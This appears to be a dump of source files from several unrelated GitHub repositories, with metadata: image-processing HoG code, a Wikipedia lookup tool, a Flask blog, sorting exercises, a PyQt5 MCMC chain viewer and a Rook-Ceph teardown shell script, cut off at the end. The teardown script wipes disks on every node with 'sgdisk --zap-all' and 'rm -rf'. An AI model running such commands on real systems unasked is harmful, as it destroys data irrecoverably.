if abs(Ix[j, i]) <= 0.0001 and abs(Iy[j, i]) <= 0.0001: # Both Ix and Iy are close to zero\n I_angle[j, i] = 0.00\n else:\n Ipr[j, i] = math.atan(Iy[j,i]/(Ix[j,i]+np.finfo(float).eps)) # Compute the angle in radians\n I_angle[j, i] = Ipr[j, i]*180/math.pi # Compute the angle in degrees\n if Ix[j, i] < 0: # If Ix is negative, 180 degrees added\n I_angle[j, i] = 180+I_angle[j, i]\n if I_angle[j, i] < 0: # If the angle is negative, 360 degrees added\n I_angle[j, i] = 360+I_angle[j, i]\n return I_mag, I_angle \n\n\ndef HoG1(Im, Ip, nbin):\n # Unsigned gradient (i.e. 0-180)\n # Im: magnitude of the image block\n # Ip: orientation of the image block \n ghist = np.zeros(shape=(1,nbin))\n [nr1, nc1] = Im.shape\n interval = np.round(180/nbin, 0)\n for i in range(nr1):\n for j in range(nc1):\n if Ip[i, j] > 180:\n Ip[i, j] = abs(Ip[i, j] - 360)\n index = int(np.int(Ip[i, j]/interval))\n if index >= nbin:\n index = index - 1\n ghist[0, index] += np.square(Im[i,j]) #Stack \n return ghist\n\ndef Histogram_Normalization(ihist):\n # Normailize input histogram ihist to a unit histogram\n total_sum = np.sum(ihist)\n nhist = ihist / total_sum\n return nhist\n\nnr_b, nc_b = 3,3\nnbin = 9\n\ndef getFeatureVec(I, I_mag, I_angle, nr_b, nc_b):\n # Use 2x2 blocks\n nr, nc = I.shape\n nbin = 9\n nr_size = int(nr/nr_b)\n nc_size = int(nc/nc_b)\n Image_HoG = np.zeros(shape=(1, nbin*nr_b*nc_b))\n for i in range(nr_b):\n for j in range(nc_b):\n I_mag_block = I_mag[i*nr_size: (i+1)*nr_size, j*nc_size: (j+1)*nc_size]\n I_angle_block = I_angle[i*nr_size: (i+1)*nr_size, j*nc_size: (j+1)*nc_size]\n # HoG1 is a function which create the HoG histogram\n gh = HoG1(I_mag_block, I_angle_block, nbin)\n # Histogram_Normalization is a function to normalize the input histogram gh\n ngh = Histogram_Normalization(gh)\n pos = j*nbin+i*nc_b*nbin\n Image_HoG[:, pos:pos+nbin] = ngh\n return Image_HoG\n\nh1 = np.zeros(shape=(25, nbin*nr_b*nc_b)) # training\nh2 = np.zeros(shape=(25, nbin*nr_b*nc_b)) # test\nd1 = np.zeros (shape=(25,25))\nd2 = d1.copy()\nchi = d2.copy()\n\nfor i in range(1,6):\n for j in range(1,6):\n I = rgb2gray(extractImg(i,j,\"training\"))\n h1[(j-1)+(i-1)*5] = getFeatureVec(I,SobelTransform(I)[0],SobelTransform(I)[1], nr_b, nc_b)\n I = rgb2gray(extractImg(i,j,\"test\"))\n h2[(j-1)+(i-1)*5] = getFeatureVec(I,SobelTransform(I)[0],SobelTransform(I)[1], nr_b, nc_b)\n\nfor i in range(25):\n for j in range(25):\n d1[i, j] = np.around(np.sum(np.abs(h2[i, :]-h1[j, :])),4)\n d2[i, j] = np.around(np.sum(np.square(np.abs(h2[i, :]-h1[j, :]))), 4)\n chi[i, j] = np.around(np.sum(np.square(np.abs(h2[i, :]-h1[j, :])) / (h2[i, :]+h1[j, :]+np.finfo(float).eps)), 4)\n\n# 11 12 13 ... 
53 54 55\n\nd1_min = np.argmin(d1,axis=1)\nd2_min = np.argmin(d2,axis=1)\nchi_min = np.argmin(chi,axis=1)\n\nacc = np.zeros(shape=(25))\nfor i in range(5):\n for j in range(5):\n acc[j+5*i] = 5*i\n\nprint(f'Matching Type: \\n{d1_min+1}')\nprint(f'Matching Type: \\n{d2_min+1}')\nprint(f'Matching Type: \\n{chi_min+1}')\n\nd1_same = d1_min - acc\nd2_same = d2_min - acc\nchi_same = chi_min - acc\nprint(np.sum(x in range(0,5) for x in d1_same) / d1_same.size)\nprint(np.sum(x in range(0,5) for x in d2_same) / d2_same.size)\nprint(np.sum(x in range(0,5) for x in chi_same) / chi_same.size)" }, { "alpha_fraction": 0.5006257891654968, "alphanum_fraction": 0.6032540798187256, "avg_line_length": 18.512195587158203, "blob_id": "cf2fc8ddd4294a8e916631b783f551af87d3be5c", "content_id": "21303ba26213948cd313d144d155fa7c33a52cb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 799, "license_type": "no_license", "max_line_length": 78, "num_lines": 41, "path": "/filtering.py", "repo_name": "cmyk-p4nd4/img_processing", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.ndimage import correlate1d,correlate\n\nx = np.full((5,7),100)\nx[1,2:6] = 200\nx[2,1::4]=200\nx[2,2:5]=160\nx[3,1:6]=200\ndummy = np.full((7,9),100)\ndummy[1:6,1:8]=x\n\nSx = np.arange(-1,2,1)\nSy = Sx.reshape(3,1)\nSxx = np.tile(Sx,(3,1))\nSxx[1,:]= 2*Sx\nSyy = np.transpose(Sxx)\n\ndef HxFinder(ix,ixy,iy):\n return np.array([[ix,ixy],[ixy,iy]]), (ix*iy-ixy*ixy-0.05*(ix+iy)*(ix+iy))\n\nCx = correlate1d(dummy,Sx,output=np.float64)\nCy = correlate(dummy,Sy,output=np.float64)\n\nI2x = Cx*Cx\nIxy = Cx*Cy\nI2y = Cy*Cy\nI2x = I2x[1:6,1:8]\nI2y = I2y[1:6,1:8]\nIxy = Ixy[1:6,1:8]\n\nprint(\"I2x:\\n\",I2x)\nprint()\nprint(\"I2y:\\n\",I2y)\nprint()\nprint(\"Ixy:\\n\",Ixy)\nprint()\nfor m in range(5):\n for n in range(7):\n print(m,n)\n print(HxFinder(I2x[m,n],Ixy[m,n],I2y[m,n]))\n print()" } ]
5
sarkafa/Wiki_Lookup
https://github.com/sarkafa/Wiki_Lookup
953764fc4647cdc3679b2c734bac3dfde7b384e5
44487c04999b9953b6f9a558f7a603e86043da97
4972a4cd0f604a6528f2545bafdb36ac261e6649
refs/heads/main
2023-06-22T02:25:00.098018
2021-07-15T23:44:46
2021-07-15T23:44:46
386,451,471
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6347476840019226, "alphanum_fraction": 0.6416284441947937, "avg_line_length": 30.01785659790039, "blob_id": "7aeb14fd201f61452b4878f9f27d05391cd23fd7", "content_id": "33cb7d93300ec8767cdd08052857563e95b54128", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1832, "license_type": "permissive", "max_line_length": 148, "num_lines": 56, "path": "/wikilookup/wikilookup/wikilookup.py", "repo_name": "sarkafa/Wiki_Lookup", "src_encoding": "UTF-8", "text": "import wikipedia\n\nlibrary = {}\n\ndef run ():\n \"\"\"Spustí vyhledávání ve Wikipedii ovládané z příkazového řádku.\n \"\"\"\n print('*'*100)\n name = input('\\nZadejte název článku: \\n\\n')\n print()\n \n if name in library.keys():\n print(library[name])\n else:\n try:\n summ = wikipedia.summary(name, auto_suggest=False)\n print(summ)\n library[name] = summ\n\n except wikipedia.exceptions.PageError as e:\n no_searches = wikipedia.search(name)\n no_text = f'Článek s názvem \"{name}\" nebyl nalezen. Zadaný text se vyskytuje v článcích s tímto názvem: \\n{\", \".join(x for x in no_searches)}'\n print(no_text)\n library[name] = no_text\n\n except wikipedia.exceptions.DisambiguationError as e:\n ambig_searches = wikipedia.search(name)\n ambig_text = f'Článek s názvem \"{name}\" není jednoznačný. Název může mít tyto významy: \\n{\", \".join(x for x in ambig_searches)}'\n print(ambig_text)\n library[name] = ambig_text\n\ndef multirun():\n \"\"\"Umožní opakované spuštění vyhledávání ve Wikipedii ovládané z příkazového řádku.\n \"\"\"\n while True:\n run()\n print()\n while True:\n print('*'*100)\n answer = input('Chcete vyhledat další článek? (A/N): ').strip()\n if (len(answer) > 0) and (answer[0] in '01ANan'):\n break \n print('Odpověď musí začínat některým ze znaků \"AN\"\\n'\n 'Zkuste odpovědět znovu.')\n if answer[0] in '0nN':\n break \n print('\\nZadali jste opakování vyhledávání.\\n')\n print('\\nVyledávání bylo na Váš pokyn ukončeno.\\n')\n\ndef initialize():\n \"\"\"Inicializuje vyhledávání.\n \"\"\"\n wikipedia.set_lang(\"cs\")\n global library\n print('\\nPro zadaný název bude vypsán souhrn článku. Vyhledávání můžete opakovat.\\n')\n multirun()\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 32, "blob_id": "19858931a4ea81e20aa4f28cfecdb3b646d8645d", "content_id": "1c02fc349ca657b99b2d93745a43b99249fe9c22", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 66, "license_type": "permissive", "max_line_length": 51, "num_lines": 2, "path": "/README.md", "repo_name": "sarkafa/Wiki_Lookup", "src_encoding": "UTF-8", "text": "# Wiki_Lookup\nReturns summary of selected arcticle from Wikipedia\n" } ]
2
goodwilrv/FlaskBlog
https://github.com/goodwilrv/FlaskBlog
45facd240967c8788e8ae879187dfc477410e1c2
82461c42b2cc994307d964d3278b5327ae123179
581fa88e486670347df1594e3172edf945fc11ea
refs/heads/master
2022-12-07T01:49:21.882733
2020-08-31T13:58:29
2020-08-31T13:58:29
291,726,046
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7064393758773804, "alphanum_fraction": 0.716856062412262, "avg_line_length": 34.16666793823242, "blob_id": "36b86f0a6a405d1b63655d6018b3344a57d16bec", "content_id": "04b5ed91d5f364c242f4b55d501f41599cb9a28b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1056, "license_type": "no_license", "max_line_length": 89, "num_lines": 30, "path": "/FlaskBlog/model.py", "repo_name": "goodwilrv/FlaskBlog", "src_encoding": "UTF-8", "text": "from FlaskBlog import db,login_manager\nfrom datetime import datetime\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n\n\nclass User(db.Model):\n id = db.Column(db.Integer,primary_key=True)\n username = db.Column(db.String(20),unique=True,nullable=False)\n email = db.Column(db.String(20),unique=True,nullable=False)\n image_file = db.Column(db.String(20),unique=False,nullable=False,default='default.jpg')\n password = db.Column(db.String(60),nullable=False)\n posts = db.relationship('Post',backref='author',lazy=True)\n\n def __repr__(self):\n return f\"User('{self.username}','{self.email}','{self.image_file}')\"\n\n\nclass Post(db.Model):\n id = db.Column(db.Integer,primary_key=True)\n title = db.Column(db.String(100),nullable=False)\n date_posted = db.Column(db.DateTime,nullable=False, default=datetime.utcnow)\n content = db.Column(db.Text, nullable=False)\n user_id = db.Column(db.Integer,db.ForeignKey(User.id),nullable=False)\n\n def __repr__(self):\n return f\"User('{self.title}','{self.date_posted}')\"\n\n" }, { "alpha_fraction": 0.6461113691329956, "alphanum_fraction": 0.6530142426490784, "avg_line_length": 26.149999618530273, "blob_id": "7ac93dcad619eb5a4976a41f1811321eccefd0c8", "content_id": "3b741b85106e00fc18e2cbc0742d37ead505482f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2173, "license_type": "no_license", "max_line_length": 93, "num_lines": 80, "path": "/FlaskBlog/routes.py", "repo_name": "goodwilrv/FlaskBlog", "src_encoding": "UTF-8", "text": "\n\nfrom flask import render_template, url_for, flash, redirect\nfrom FlaskBlog.model import User, Post\nfrom FlaskBlog.forms import RegistrationForm, LoginForm\nfrom FlaskBlog import app,db, bcrypt\nfrom flask_login import UserMixin, login_user, current_user, logout_user\n\n\nposts = [\n {\n 'author':'Gautam Kumar',\n 'title':'Blog Post 1',\n 'content':'First Post content',\n 'date_posted':'May 28, 2020'\n },\n\n {\n 'author':'Manisha Bhagat',\n 'title':'Blog Post 2',\n 'content':'second Post content',\n 'date_posted':'May 29, 2020'\n }\n]\n\n\n\n\n \n\n\[email protected]('/')\[email protected]('/home')\ndef home():\n return render_template('home.html',posts=posts)\n\n\[email protected]('/about')\ndef about():\n return render_template('about.html',title = 'About Flask Title')\n\n\[email protected]('/register',methods=['GET','POST'])\ndef register():\n\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n\n form = RegistrationForm()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n user = User(username = form.username.data, email =form.email.data,password=hashed_password)\n db.session.add(user)\n db.session.commit()\n flash('Your account has been Created, you can now login','success')\n\n #flash(f'Account Created for {form.username.data}!','success')\n return redirect(url_for('login'))\n return render_template('register.html', 
title='Register',form=form)\n\n\[email protected]('/login',methods=['GET','POST'])\ndef login():\n\n    if current_user.is_authenticated:\n        return redirect(url_for('home'))\n\n    form = LoginForm()\n    if form.validate_on_submit():\n        user = User.query.filter_by(email=form.email.data).first()\n        if user and bcrypt.check_password_hash(user.password,form.password.data):\n            login_user(user,remember=form.remember.data)\n            return redirect(url_for('home'))\n        else:\n            flash('Login Unsuccessful, Please check UserName and Password','danger')\n\n    return render_template('login.html', title='Login',form=form)\n\[email protected]('/logout')\ndef logout():\n    logout_user()\n    return redirect(url_for('home'))" }, { "alpha_fraction": 0.7758620977401733, "alphanum_fraction": 0.7758620977401733, "avg_line_length": 57, "blob_id": "6af917250fda4d2dffa0ee288e22c47cc0575b7d", "content_id": "48d1150f6ea21daa6e787938411836f4b2ba7b8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 232, "license_type": "no_license", "max_line_length": 131, "num_lines": 4, "path": "/README.md", "repo_name": "goodwilrv/FlaskBlog", "src_encoding": "UTF-8", "text": "# FlaskBlog\n\nA Flask blog application that reads blog entries from a database and renders them.\nIt includes forms, models and routes for the sign-up and sign-in pages.\n" } ]
3
aayush2906/data_structures-Python
https://github.com/aayush2906/data_structures-Python
26053c74defed6e0fa715b20ed30da1d1939b844
8704dbaab77babe7f7499a4458b94e9b3ebf5652
2f7a97c45fb6fbc6b8d943535ebc275ff2a07cae
refs/heads/master
2020-04-16T09:31:39.540614
2019-01-13T07:36:38
2019-01-13T07:36:38
165,467,427
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.8313252925872803, "alphanum_fraction": 0.8313252925872803, "avg_line_length": 40.5, "blob_id": "a0cab135f49dd84ccdb779335aade5afc2f39f5a", "content_id": "7644e1d27bd49f85709a9b7d7e5a7ad506db8b32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 83, "license_type": "no_license", "max_line_length": 57, "num_lines": 2, "path": "/README.md", "repo_name": "aayush2906/data_structures-Python", "src_encoding": "UTF-8", "text": "# data_structures-Python\nThis repository contains codes in python's data structure\n" }, { "alpha_fraction": 0.5567010045051575, "alphanum_fraction": 0.5592783689498901, "avg_line_length": 21.823530197143555, "blob_id": "4d488e57f671555cf1d172c5a08c8d4a27d2e846", "content_id": "35b16cd61167c3941d26877e8da6f3414a6a03e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, "license_type": "no_license", "max_line_length": 49, "num_lines": 17, "path": "/Selection_sort.py", "repo_name": "aayush2906/data_structures-Python", "src_encoding": "UTF-8", "text": "#selection sort\n\ndef SelectionSort(l):\n for start in range(len(l)):\n minpos=start\n for i in range(start,len(l)):\n if l[i]<l[minpos]:\n minpos=i\n (l[start],l[minpos])=(l[minpos],l[start])\n\nl=[]\nn=int(input(\"Size of list::\"))\nfor i in range(0,n):\n x=int(input(\"Enter element::\"))\n l.insert(i,x)\nSelectionSort(l)\nprint(\"Sorted list\",l)\n" }, { "alpha_fraction": 0.5418848395347595, "alphanum_fraction": 0.5575916171073914, "avg_line_length": 27.30769157409668, "blob_id": "9a824124ce6934707dbce9f9f3dcd457e5a4d855", "content_id": "8e45b8bd07ebbb87037419b03021454347e04a96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 382, "license_type": "no_license", "max_line_length": 55, "num_lines": 13, "path": "/InsertionSort.py", "repo_name": "aayush2906/data_structures-Python", "src_encoding": "UTF-8", "text": "\ndef InsertionSort(seq):\n for sliceEnd in range(len(seq)):\n pos=sliceEnd\n while pos > 0 and seq[pos] < seq[pos-1]:\n (seq[pos],seq[pos-1])=(seq[pos-1],seq[pos])\n pos=pos-1\nseq=[]\nn=int(input(\"Size of list::\"))\nfor i in range(0,n):\n x=int(input(\"Enter element::\"))\n seq.insert(i,x)\nInsertionSort(seq)\nprint(\"Sorted list\",seq) \n \n" } ]
3
nmr2701/IGCSE-Task
https://github.com/nmr2701/IGCSE-Task
550e0064f87fd518fbfbfd0a0f26deff9385454c
9946104bf24f038e9268ff0a54a10496f8701966
ce498353b32d9beb5a409de5b88263dd34754cf3
refs/heads/main
2023-03-31T04:17:22.484726
2021-04-04T17:37:50
2021-04-04T17:37:50
354,605,394
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6252120137214661, "alphanum_fraction": 0.6331260800361633, "avg_line_length": 28.433332443237305, "blob_id": "74352da782449ca587457224d83bad5e41d6718f", "content_id": "6441c3e3f9f2451ff7ced35e735eacb36ea9bb1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1769, "license_type": "no_license", "max_line_length": 111, "num_lines": 60, "path": "/final.py", "repo_name": "nmr2701/IGCSE-Task", "src_encoding": "UTF-8", "text": "Item_No = []\nItem_Description = []\nReserve_Price = []\nNo_of_Bids = []\nPlace = 0\nContinue = 1\nItem_Bid = 0\n\n\ndef datainput(Place, Item_No, Item_Description, Reserve_Price, No_of_Bids):\n while Continue == 1:\n item_no = int(input(\"Please input the Item ID: \"))\n item_description = str(input(\"Please input a brief description of the item: \"))\n reserve_price = str(input(\"Pleae input a reserve price: \"))\n no_of_bids = 0\n Item_No.append(item_no)\n Item_Description.append(item_description)\n Reserve_Price.append(reserve_price)\n No_of_Bids.append(no_of_bids)\n Place = Place + 1\n End_Input(Continue,Place)\n\ndef End_Input (Continue, Place):\n Continue = int(input(\"Input 1 to continue adding items or 0 to stop inputing items and start the auction: \"))\n if Continue == 0:\n if Place>0:\n Auction_Bid()\n else:\n print(\"You need at least 10 items to start the auction\")\n print(\"You can now input more items\")\n Continue = 1\n elif Continue ==1:\n print(\"\")\n else:\n print(\"Sorry what you inputted is not valid.\")\n End_Input(Continue,Place)\n\ndef Auction_Bid():\n for x in range (len(Item_No)):\n print(\"Item ID:\\n\", Item_No[x])\n \n print(\"Item Description:\\n\" + Item_Description[x])\n \n print(\"Reserve Price:\\n\" + Reserve_Price[x])\n \n if input(\"Please input 'Yes' if you would like to bid on an item \")==\"Yes\" or \"Yes\":\n Item_Bid = int(input(\"Please Input the Item ID of the item you would like to look at \"))\n Buyer_ID = int(input(\"Please Input your Buyer ID \"))\n for x in range (len(Item_No)):\n if Item_Bid in Item_No:\n print(Item_No[x])\n print(Item_Description[x])\n \n \n \n\n \n \n \ndatainput(Place, Item_No, Item_Description, Reserve_Price, No_of_Bids)\n\n\n\n" } ]
1
johnveitch/chainplotter
https://github.com/johnveitch/chainplotter
acd00dc4e03b541d2e7a236cb5fc4916336f4502
c23827ac74e095bb36e0643ef83943093615f4a2
626173469e9f36164c3f236c3f8b6d2e1fd0bb0a
refs/heads/master
2021-05-13T11:58:11.250597
2018-01-14T16:29:06
2018-01-14T16:29:06
117,146,600
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6011961102485657, "alphanum_fraction": 0.6092225313186646, "avg_line_length": 32.97861099243164, "blob_id": "c4d1a7c82c260b9829e10d6d36765b8567abbb2a", "content_id": "153042037f17fa8b0063572a4c5081fb4c90faf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6354, "license_type": "no_license", "max_line_length": 135, "num_lines": 187, "path": "/chainplotter", "repo_name": "johnveitch/chainplotter", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# chainplotter.py --- Simple Qt5 application embedding matplotlib canvases\n# (C) 2018 John Veitch\n\n# Based on embedding in Qt5 demo\n# Copyright (C) 2005 Florent Rougon\n# 2006 Darren Dale\n# 2015 Jens H Nielsen\n#\n\nfrom __future__ import unicode_literals\nimport sys\nimport os\nfrom pathlib import Path\nimport matplotlib\nimport numpy as np\n# Make sure that we are using QT5\nmatplotlib.use('Qt5Agg')\nfrom PyQt5 import QtCore, QtWidgets\n\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\n\nprogname = os.path.basename(sys.argv[0])\nprogversion = \"0.1\"\n\nclass MyMplCanvas(FigureCanvas):\n \"\"\"Ultimately, this is a QWidget (as well as a FigureCanvasAgg, etc.).\"\"\"\n\n def __init__(self, parent=None, width=5, height=4, dpi=100):\n fig = Figure(figsize=(width, height), dpi=dpi)\n self.axes = fig.add_subplot(111)\n\n self.compute_initial_figure()\n\n FigureCanvas.__init__(self, fig)\n self.setParent(parent)\n\n FigureCanvas.setSizePolicy(self,\n QtWidgets.QSizePolicy.Expanding,\n QtWidgets.QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n def compute_initial_figure(self):\n pass\n\nclass ChainPlot(MyMplCanvas):\n \"\"\"A canvas that updates itself every second with a new plot.\"\"\"\n\n def __init__(self, *args, filename=None, param=None, **kwargs, ):\n MyMplCanvas.__init__(self, *args, **kwargs)\n self.filename=filename\n self.mtime=0\n self.param=param\n self.posterior=None\n timer = QtCore.QTimer(self)\n timer.timeout.connect(self.refresh_data)\n timer.start(1000)\n\n def refresh_data(self):\n if not self.filename: return\n if not os.path.exists(self.filename): return\n newtime = os.path.getmtime(self.filename)\n if newtime > self.mtime:\n self.mtime = newtime\n self.posterior = np.genfromtxt(self.filename,skip_footer=1,names=True,deletechars=\"\")\n self.update_figure()\n\n def update_figure(self):\n if self.posterior is None: return\n \n # Build a list of 4 random integers between 0 and 10 (both inclusive)\n self.axes.cla()\n self.axes.plot(self.posterior[self.param].T,',')\n self.axes.set_xlabel('iteration')\n self.axes.set_ylabel(self.param)\n self.axes.set_title(self.filename)\n self.figure.tight_layout()\n self.draw()\n\n\nclass ApplicationWindow(QtWidgets.QMainWindow):\n def __init__(self):\n QtWidgets.QMainWindow.__init__(self)\n self.infile=None\n self.param=None\n self.names=[]\n self.setAttribute(QtCore.Qt.WA_DeleteOnClose)\n self.setWindowTitle(\"application main window\")\n\n self.file_menu = QtWidgets.QMenu('&File', self)\n self.file_menu.addAction('&Open', self.fileLoad,\n QtCore.Qt.CTRL + QtCore.Qt.Key_O)\n self.file_menu.addAction('&Save Figure',self.figSave,\n QtCore.Qt.CTRL + QtCore.Qt.Key_S)\n self.file_menu.addAction('&Quit', self.fileQuit,\n QtCore.Qt.CTRL + QtCore.Qt.Key_Q)\n self.menuBar().addMenu(self.file_menu)\n\n self.help_menu = QtWidgets.QMenu('&Help', self)\n self.menuBar().addSeparator()\n self.menuBar().addMenu(self.help_menu)\n\n 
self.help_menu.addAction('&About', self.about)\n\n self.main_widget = QtWidgets.QWidget(self)\n\n l = QtWidgets.QVBoxLayout(self.main_widget)\n self.dc = ChainPlot(self.main_widget, width=5, height=4, dpi=100, filename=self.infile, param=self.param)\n l.addWidget(self.dc)\n \n # Box to select parameter\n grp=QtWidgets.QGroupBox('Parameters')\n bl=QtWidgets.QVBoxLayout(grp)\n self.pcombo=QtWidgets.QComboBox(self.main_widget)\n self.pcombo.currentTextChanged.connect(self.set_param)\n\n bl.addWidget(self.pcombo)\n l.addWidget(grp)\n \n self.main_widget.setFocus()\n self.setCentralWidget(self.main_widget)\n \n def fileLoad(self):\n \"\"\"\n Set the input file\n \"\"\"\n f, pattern = QtWidgets.QFileDialog(self,'Open File',self.infile).getOpenFileName(self,\"Set file to watch\")\n if f:\n self.set_infile(f)\n \n def figSave(self):\n f, pattern = QtWidgets.QFileDialog(self,'Save Figure',os.path.dirname(self.infile)).getSaveFileName(self,\"Choose file to save\")\n if f:\n self.dc.figure.savefig(f)\n self.statusBar().showMessage(f'{f}: file written')\n\n def fileQuit(self):\n self.close()\n\n def closeEvent(self, ce):\n self.fileQuit()\n\n def about(self):\n QtWidgets.QMessageBox.about(self, \"About\",\n \"\"\"chainplotter\n For monitoring MCMC chains\n author: J. Veitch <[email protected]>\"\"\"\n )\n\n def set_infile(self,filename):\n if not os.path.exists(filename):\n self.statusBar().showMessage(f'File not found: {filename}')\n return\n with open(filename) as f:\n self.names=f.readline().split()\n # Add combo box for parameter names\n self.pcombo.clear()\n self.pcombo.addItems(self.names)\n self.infile=filename\n self.dc.filename=filename\n self.dc.mtime=0\n self.dc.refresh_data()\n #self.dc.update_figure()\n \n def set_param(self,param):\n self.param=param\n self.dc.param=param\n self.dc.update_figure()\n\n\nif __name__=='__main__':\n from argparse import ArgumentParser\n parser=ArgumentParser(prog='chainplotter',description='A simple GUI for watching live MCMC chains')\n parser.add_argument('-i','--input',default=None,metavar='FILE',help='input file to plot')\n parser.add_argument('-p','--param',default=None,metavar='PARAMNAME',help='Parameter to plot')\n opts=parser.parse_args(sys.argv[1:])\n \n qApp = QtWidgets.QApplication(sys.argv)\n\n aw = ApplicationWindow()\n if opts.input: aw.set_infile(opts.input)\n if opts.param: aw.set_param(opts.param)\n aw.setWindowTitle(\"%s\" % progname)\n aw.show()\n sys.exit(qApp.exec_())\n #qApp.exec_()\n" }, { "alpha_fraction": 0.6848484873771667, "alphanum_fraction": 0.6909090876579285, "avg_line_length": 15.399999618530273, "blob_id": "c46cdbd57fb894447fc85df2efc9686567974e67", "content_id": "38e099e4eb99cbdd6677ddce40fb9c5e35def86a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 165, "license_type": "no_license", "max_line_length": 57, "num_lines": 10, "path": "/README.md", "repo_name": "johnveitch/chainplotter", "src_encoding": "UTF-8", "text": "# chainplotter\n\nAllows easy viewing of live MCMC chains with a simple GUI\n\n * author: John Veitch <[email protected]>\n\n\n### Example Usage\n\n`./chainplotter -i chain.txt -p param1`\n\n" } ]
2
sebastian-philipp/test-rook-orchestrator
https://github.com/sebastian-philipp/test-rook-orchestrator
feb2c9a74a7dab65bc68285316b1ad708ca2f485
dff53925832bf6851707f0180dca9f081e0ad874
8d3ba68d7fcb6cc65536a823fdf7bf5f435b8029
refs/heads/master
2020-05-06T12:19:14.439302
2019-05-16T14:11:12
2019-05-16T14:11:12
180,116,425
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.697756290435791, "alphanum_fraction": 0.7096348404884338, "avg_line_length": 33.40909194946289, "blob_id": "c9032a57e9d18127fb2f8c58b92604a23bec5c68", "content_id": "2c048f445276bf7efb43a6c3717ec68f07f37cf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2273, "license_type": "no_license", "max_line_length": 130, "num_lines": 66, "path": "/undeploy-rook-ceph.sh", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nset -x\n\ncrs=\"CephNFS CephObjectStore CephFilesystem CephCluster job\"\napps=\"mon mgr osd mds rgw tools\"\n\n# finalizers can deadlock\ntimeout 30 kubectl patch --namespace=rook-ceph deployment rook-ceph-operator -p '{\"spec\": {\"replicas\": 0}}'\ntimeout 30 kubectl patch --namespace=rook-ceph crd cephcluster.ceph.rook.io -p '{\"metadata\":{\"finalizers\":[]}}' --type=merge\ntimeout 30 kubectl patch --namespace=rook-ceph cephcluster.ceph.rook.io rook-ceph -p '{\"metadata\":{\"finalizers\":[]}}' --type=merge\n\nfor cr in $crs\ndo\n timeout 30 kubectl delete --namespace=rook-ceph $cr --grace-period=0 --force --all\ndone\n\ntimeout 30 kubectl delete -f cluster-minimal.yaml\ntimeout 30 kubectl delete -f toolbox.yaml\ntimeout 30 kubectl delete --namespace=rook-ceph pod -n rook-ceph -l app=rook-ceph-operator\n\nfor primitive in service deployment pod\ndo\n for app in $(echo $apps)\n do\n timeout 30 kubectl delete --namespace=rook-ceph $primitive --grace-period=0 --force -l app=rook-ceph-$app\n done\ndone\n\ntimeout 30 kubectl delete pod --namespace=rook-ceph -l job=rook-ceph-detect-version\ntimeout 30 kubectl delete pod --namespace=rook-ceph -l job-name=rook-ceph-nfs-ganesha-rados-grace\n\nfor app in $(echo $apps)\ndo\n while kubectl get pod --namespace=rook-ceph -l app=rook-ceph-$app -o json | jq -e '.items[0].metadata.labels.app' ; do\n sleep 1\n done\ndone\n\nfor cr in $(echo $crs)\ndo\n while kubectl get --namespace=rook-ceph $cr rook-ceph ; do\n sleep 1\n done\ndone\n\n\npushd ./kubic-terraform-kvm\nfor h in $(terraform output -json | jq -r '.ips.value[][]')\ndo\n cat <<'EOF' | ssh -F ssh_config $h 'bash -x -s'\n#!/usr/bin/env bash\n# Zap the disk to a fresh, usable state (zap-all is important, b/c MBR has to be clean)\n# You will have to run this step for all disks.\nsgdisk --zap-all /dev/vdb\n\n# These steps only have to be run once on each node\n# If rook sets up osds using ceph-volume, teardown leaves some devices mapped that lock the disks.\nls /dev/mapper/ceph-* | xargs -I% -- dmsetup remove %\n# ceph-volume setup can leave ceph-<UUID> directories in /dev (unnecessary clutter)\nrm -rf /dev/ceph-*\nrm -rf /var/lib/rook\nEOF\ndone\npopd\n\nkubectl patch --namespace=rook-ceph deployment rook-ceph-operator -p '{\"spec\": {\"replicas\": 1}}'\n\n\n" }, { "alpha_fraction": 0.4528301954269409, "alphanum_fraction": 0.5283018946647644, "avg_line_length": 16.66666603088379, "blob_id": "51456f1803d1fb4e7ce505c836d0e19049ff2f28", "content_id": "a54d56cadbcffdc9277cf846f5defb3046fce0c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 53, "license_type": "no_license", "max_line_length": 41, "num_lines": 3, "path": "/waitssh.sh", "repo_name": "sebastian-philipp/test-rook-orchestrator", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nwhile ! 
